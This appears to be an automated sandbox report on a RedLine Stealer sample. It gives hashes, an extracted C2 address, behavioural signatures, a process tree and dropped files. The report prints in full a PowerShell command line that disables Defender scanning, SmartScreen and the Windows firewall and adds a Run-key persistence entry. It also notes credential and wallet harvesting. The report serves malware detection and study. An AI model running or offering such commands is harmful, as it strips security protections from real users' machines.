Analysis
- max time kernel: 44s
- max time network: 105s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 07-07-2022 14:32

Static task: static1

Behavioral task: behavioral1
  Sample: 47645.exe
  Resource: win7-20220414-en

Behavioral task: behavioral2
  Sample: 47645.exe
  Resource: win10v2004-20220414-en
General
- Target: 47645.exe
- Size: 1.8MB
- MD5: 30b6d624d18490acfe42a1944c6d3172
- SHA1: 35402770ba44139f50b5613c274a6b4607be3b16
- SHA256: d3d816173bc3f78e89278f938bef7408a249453c31e65018386aa241ee6cbf92
- SHA512: 42f7b92a99a52c9a229cf09d945d5fcad38a4eecedfe609af6e77d9f5e966b37835a094c5b2121d20e6339fa450c0488af44046f5057e42021a61aae98cf6f4c
Malware Config
Extracted
- Family: redline
- Botnet: 1327052997
- C2: 37.235.54.26:8362
Signatures
- Modifies security service (2 TTPs, 1 IoC)
  Processes:
    description | ioc | process
    Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" | powershell.exe
- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
- RedLine payload (4 IoCs)
  Processes:
    resource | yara_rule
    behavioral1/memory/213420-65-0x0000000000400000-0x000000000041E000-memory.dmp | family_redline
    behavioral1/memory/213420-70-0x000000000041972E-mapping.dmp | family_redline
    behavioral1/memory/213420-71-0x0000000000400000-0x000000000041E000-memory.dmp | family_redline
    behavioral1/memory/213420-72-0x0000000000400000-0x000000000041E000-memory.dmp | family_redline
- suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
- Downloads MZ/PE file
- Executes dropped EXE (2 IoCs)
  Processes:
    pid | process
    1448 | doc.exe
    1364 | DllHost.exe
- Modifies Windows Firewall (1 TTP, 1 IoC)
- Drops startup file (1 IoC)
  Processes:
    description | ioc | process
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk | DllHost.exe
- Loads dropped DLL (9 IoCs)
  Processes:
    pid | process
    536 | 47645.exe
    536 | 47645.exe
    536 | 47645.exe
    1268 |
    1364 | DllHost.exe
    213620 | WerFault.exe
    213620 | WerFault.exe
    213620 | WerFault.exe
    213620 | WerFault.exe
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Looks up external IP address via web service (3 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow | ioc
    8 | api.ipify.org
    10 | api.ipify.org
    11 | api.ipify.org
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
    description | pid | process | target process
    PID 1448 set thread context of 213420 | 1448 | doc.exe | AppLaunch.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Program crash (1 IoC)
  Processes:
    pid | pid_target | process | target process
    213620 | 1364 | WerFault.exe | DllHost.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes:
    pid | process
    1364 | DllHost.exe
    1364 | DllHost.exe
    213568 | powershell.exe
    213420 | AppLaunch.exe
    213420 | AppLaunch.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 213420 | AppLaunch.exe
    Token: SeDebugPrivilege | 213568 | powershell.exe
- Suspicious use of WriteProcessMemory (26 IoCs)
  Processes:
    description | pid | process | target process
    PID 536 wrote to memory of 1448 | 536 | 47645.exe | doc.exe
    PID 536 wrote to memory of 1448 | 536 | 47645.exe | doc.exe
    PID 536 wrote to memory of 1448 | 536 | 47645.exe | doc.exe
    PID 536 wrote to memory of 1448 | 536 | 47645.exe | doc.exe
    PID 536 wrote to memory of 1364 | 536 | 47645.exe | DllHost.exe
    PID 536 wrote to memory of 1364 | 536 | 47645.exe | DllHost.exe
    PID 536 wrote to memory of 1364 | 536 | 47645.exe | DllHost.exe
    PID 536 wrote to memory of 1364 | 536 | 47645.exe | DllHost.exe
    PID 1448 wrote to memory of 213420 | 1448 | doc.exe | AppLaunch.exe
    PID 1448 wrote to memory of 213420 | 1448 | doc.exe | AppLaunch.exe
    PID 1448 wrote to memory of 213420 | 1448 | doc.exe | AppLaunch.exe
    PID 1448 wrote to memory of 213420 | 1448 | doc.exe | AppLaunch.exe
    PID 1448 wrote to memory of 213420 | 1448 | doc.exe | AppLaunch.exe
    PID 1448 wrote to memory of 213420 | 1448 | doc.exe | AppLaunch.exe
    PID 1448 wrote to memory of 213420 | 1448 | doc.exe | AppLaunch.exe
    PID 1448 wrote to memory of 213420 | 1448 | doc.exe | AppLaunch.exe
    PID 1448 wrote to memory of 213420 | 1448 | doc.exe | AppLaunch.exe
    PID 1364 wrote to memory of 213568 | 1364 | DllHost.exe | powershell.exe
    PID 1364 wrote to memory of 213568 | 1364 | DllHost.exe | powershell.exe
    PID 1364 wrote to memory of 213568 | 1364 | DllHost.exe | powershell.exe
    PID 1364 wrote to memory of 213620 | 1364 | DllHost.exe | WerFault.exe
    PID 1364 wrote to memory of 213620 | 1364 | DllHost.exe | WerFault.exe
    PID 1364 wrote to memory of 213620 | 1364 | DllHost.exe | WerFault.exe
    PID 213568 wrote to memory of 213700 | 213568 | powershell.exe | netsh.exe
    PID 213568 wrote to memory of 213700 | 213568 | powershell.exe | netsh.exe
    PID 213568 wrote to memory of 213700 | 213568 | powershell.exe | netsh.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\47645.exe (depth 1)
  command line: "C:\Users\Admin\AppData\Local\Temp\47645.exe"
  signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\doc.exe (depth 2)
    command line: "C:\Users\Admin\AppData\Local\Temp\doc.exe"
    signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe (depth 3)
      command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\DllHost.exe (depth 2)
    command line: "C:\Users\Admin\AppData\Local\Temp\DllHost.exe"
    signatures: Executes dropped EXE; Drops startup file; Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      signatures: Modifies security service; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\system32\netsh.exe (depth 4)
        command line: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
        signatures: Modifies Windows Firewall
    - C:\Windows\system32\WerFault.exe (depth 3)
      command line: C:\Windows\system32\WerFault.exe -u -p 1364 -s 1516
      signatures: Loads dropped DLL; Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\DllHost.exe
  Filesize: 440KB
  MD5: 6368031626da1f0d51bcac43104b123f
  SHA1: 5a340a1a3edc0bf03526e677a0415ffd156c139c
  SHA256: 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
  SHA512: 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
- C:\Users\Admin\AppData\Local\Temp\doc.exe
  Filesize: 2.4MB
  MD5: 401cdd939e412e97c9eab5766be869d9
  SHA1: e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0
  SHA256: 7b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573
  SHA512: 266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b
- \ProgramData\MicrosoftNetwork\System.exe
  Filesize: 440KB
  MD5: 6368031626da1f0d51bcac43104b123f
  SHA1: 5a340a1a3edc0bf03526e677a0415ffd156c139c
  SHA256: 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
  SHA512: 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
- \Users\Admin\AppData\Local\Temp\DllHost.exe
  Filesize: 440KB
  MD5: 6368031626da1f0d51bcac43104b123f
  SHA1: 5a340a1a3edc0bf03526e677a0415ffd156c139c
  SHA256: 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
  SHA512: 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
- \Users\Admin\AppData\Local\Temp\doc.exe
  Filesize: 2.4MB
  MD5: 401cdd939e412e97c9eab5766be869d9
  SHA1: e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0
  SHA256: 7b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573
  SHA512: 266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b